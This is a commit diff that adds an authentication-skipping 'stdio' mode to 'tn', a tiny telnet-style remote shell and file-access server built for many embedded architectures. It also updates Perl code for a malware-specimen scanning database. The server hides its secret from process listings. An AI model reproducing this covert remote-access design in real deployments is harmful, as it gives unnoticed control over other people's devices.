Commit 1d56b4d1 authored by The White Team's avatar The White Team

implement a "local mode" for tn, using a scary goto. that will

be used by nodes to scan themselves without dealing with any crypto.
remove c++ stuff from tn binary, for a record low size:

-rwx------ 1 root root 6262 Nov  4 00:00 arch/armeb-sf/tn
-rwx------ 1 root root 6380 Nov  4 00:00 arch/armgeb-sf/tn
-rwx------ 1 root root 6316 Nov  4 00:00 arch/armgel-sf/tn
-rwx------ 1 root root 6172 Nov  4 00:00 arch/arm-sf/tn
-rwx------ 1 root root 8586 Nov  4 00:00 arch/mips1-sf/tn
-rwx------ 1 root root 8588 Nov  4 00:00 arch/mipsel1-sf/tn
-rwx------ 1 root root 7232 Nov  4 00:00 arch/ppc-sf/tn
-rwx------ 1 root root 5837 Nov  4 00:00 arch/sh4b-sf/tn
-rwx------ 1 root root 5773 Nov  4 00:00 arch/sh4l-sf/tn
-rwx------ 1 root root 5753 Nov  4 00:00 arch/x86/tn
parent e1a8a2d0
No preview for this file type
......@@ -32,6 +32,8 @@ use bm::specimen;
use Digest::SHA ();
use Digest::SHA3 ();
my @names;
for my $cat (0 .. $#bm::specimen::CATEGORY) {
my %indb;
{
......@@ -39,16 +41,29 @@ for my $cat (0 .. $#bm::specimen::CATEGORY) {
@indb{@sha256} = (1) x @sha256;
}
bin:
for my $bin (<specimen/$bm::specimen::CATEGORY[$cat]/*.bin>) {
(my $sha256 = $bin) =~ s%^.*/%%;
$sha256 = pack "H64", $sha256;
next if delete $indb{$sha256};
push @{ $names[$cat] }, [$bin, $sha256];
}
for my $sha256 (keys %indb) {
next if -f bm::specimen::path $cat, $sha256, "meta";
printf "removing from database: %s %s\n", $bm::specimen::CATEGORY[$cat], unpack "H*", $sha256;
sql_exec "delete from specimen where sha256 = ?", $sha256;
}
}
for my $cat (0 .. $#bm::specimen::CATEGORY) {
bin:
for (@{ $names[$cat] }) {
my ($bin, $sha256) = @$_;
bm::specimen::load $cat, $sha256, my $data;
bm::specimen::load $cat, $sha256, my $data
or die "$bin: $!\n";
length $data
or next;
or die "$bin: zero length file\n";
my $sha3_1k = Digest::SHA3::sha3_256 substr $data, 0, 1024;
......@@ -58,7 +73,8 @@ bin:
$sha3_1k;
while ($st->fetch) {
bm::specimen::load $o_cat, $o_sha256, my $o_data;
bm::specimen::load $o_cat, $o_sha256, my $o_data
or next;
if (length $o_data >= length $data) {
if ($data eq substr $o_data, 0, length $data) {
......@@ -90,10 +106,5 @@ bin:
length $data,
$cat;
}
for (keys %indb) {
printf "removing from database: %s\n", unpack "H*", $_;
sql_exec "delete from specimen where sha256 = ?", $_;
}
}
......@@ -26,6 +26,7 @@ use strict;
use Socket ();
use Coro ();
use POSIX ();
use bm::socks;
use bn::io;
......
......@@ -32,6 +32,7 @@ our @CATEGORY = qw(
unknown
malware
corruptelf
corruptupx
dynamic
innocent
suspicious
......@@ -59,10 +60,13 @@ sub load($$$)
my $path = &pathbin;
open my $fh, "<:raw", $path
or die "$path: $!\n";
or return 0;
my $size = -s $fh;
$size == sysread $fh, $_[2], $size
or die "$path: short read\n";
or return 0;
1
}
1
......
......@@ -38,6 +38,57 @@ sub new
($self, $id, $chg);
}
# same as new, but uses local .net_tn
sub new_exec
{
my ($class, $path) = @_;
socketpair $c, $s, Socket::AF_UNIX, Socket::SOCK_STREAM, 0
or return;
if (fork eq 0) {
open STDIN, "<&", fileno $s;
open STDOUT, ">&", fileno $s;
close $c;
close $s;
exec $path, "--slave", "a" x (64 + 64 + 4), 0;
POSIX::_exit 255;
}
close $s;
my $self = bless [$c, undef, $path, undef, undef, undef, undef, ""], $class;
$self->_login;
$self
}
sub _login
{
my ($self) = @_;
($self->[3], $self->[4]) = split /\//, $self->rpkt;
$self->[5] = $self->rpkt eq "\x11\x22\x33\x44" ? ">" : "<";
return unless $self->[3] =~ /^(?:14|15|16|17|18)$/;
1 while length $self->rpkt; # env, unused
1
}
sub login
{
my ($self, $resp) = @_;
my $fh = $self->[0];
bn::io::xwrite $fh, pack "C/a", $resp;
$self->_login;
}
sub rpkt
{
my $self = shift;
......@@ -92,24 +143,6 @@ sub wpack
$self->wpkt($self->pack($pack, @args));
}
sub login
{
my ($self, $resp) = @_;
my $fh = $self->[0];
bn::io::xwrite $fh, pack "C/a", $resp;
($self->[3], $self->[4]) = split /\//, $self->rpkt;
$self->[5] = $self->rpkt eq "\x11\x22\x33\x44" ? ">" : "<";
return unless $self->[3] =~ /^(?:14|15)$/;
1 while length $self->rpkt; # env, unused
1
}
sub unlink
{
my ($self, $path) = @_;
......
......@@ -20,6 +20,12 @@
// usage: tn port id64.secret64.port4 -- primitive telnet server
// this program was written to be as small as possible, without
// completely sacrificing performance, and provide a network
// efficient protocol at the same time. error checking is
// moved into the kernel as much as possible, and a number of
// space saving but rather dirty tricks are being used.
// 1 -- start shell
// 2 path -- open rdonly
// 3 path -- open wrcreat
......@@ -85,9 +91,17 @@
// ver 16
// "unlimited" (~8k) packet length (packet length 255 chains to next)
// accept no longer accepts multiple message packets
// minor space optimisation
// minor size optimisations
// ver 17
// increase number of distinct challenges when urandom is missing
// exit child on 0 packet, do not enter accept loop
// ver 18
// implement a "stdio" slave mode (when started with three arguments)
// a socket is expected as stdin/stdout, authentication is skipped
#define VERSION "16"
#define VERSION "18"
#include <errno.h>
#include <unistd.h>
......@@ -255,6 +269,9 @@ int main(int argc, char *argv[])
eargv[2] = argv[1];
execve(argv[0], eargv, environ);
}
syscall(SCN(SYS_umask), 0000);
// copy id + challenge-response secret from commandline.
// also space out commandline secret, to be less obvious.
// some ps versions unfortunately show the spaces.
......@@ -268,7 +285,8 @@ int main(int argc, char *argv[])
argv[2][i] = ' ';
}
syscall(SCN(SYS_umask), 0000);
if (argc == 4)
goto handle_client; // I did not know this would even be possible - but it sure saves space
int ls = tcp_socket();
......@@ -308,10 +326,8 @@ int main(int argc, char *argv[])
read(i, secret, 32);
close(i);
++secret[0];
for (i = 0; i < 31; ++i)
secret[i + 1] += secret[i];
// if urandom is not available, "increment" challenge
++((uint32_t *) secret)[0];
}
int fd = accept(0, 0, 0);
......@@ -339,6 +355,9 @@ int main(int argc, char *argv[])
if (memcmp(buffer, buffer + 33, 32))
x();
handle_client:
fd = 3; // for stdio mode
wpkt(MSG(VERSION "/" arch)); /* version/arch */
static const uint32_t endian = 0x11223344;
......@@ -594,6 +613,8 @@ int main(int argc, char *argv[])
default:
x();
}
x();
}
// keep fd open for at least 1s, also delay hack attempts
sleep_ms(1000);
......
......@@ -41,8 +41,11 @@ void kill_9(void)
#define DESTROY_SYMBOL(sym) void sym(void) __attribute ((alias ("kill_9")));
// gcc overhead, requires -nostartfiles and some tweaking. these are not called by our __uClibc_main
DESTROY_SYMBOL(_init)
DESTROY_SYMBOL(_fini)
// uclibc overhead
DESTROY_SYMBOL(abort)
DESTROY_SYMBOL(abort)
DESTROY_SYMBOL(__GI_abort)
// arm eabi overhead
DESTROY_SYMBOL(__aeabi_unwind_cpp_pr0)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment